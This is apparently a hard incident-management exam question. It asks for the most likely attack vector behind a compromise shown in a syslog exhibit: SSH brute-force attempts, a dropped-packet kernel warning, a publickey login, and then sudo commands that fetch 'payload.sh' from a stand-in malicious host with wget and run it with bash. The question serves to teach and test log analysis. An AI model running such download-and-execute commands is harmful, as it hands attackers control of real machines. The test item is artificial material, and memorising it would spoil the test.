1
Incident Management
hard
Based on the exhibit, what is the MOST likely attack vector that led to the compromise?
Exhibit
Refer to the exhibit. Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh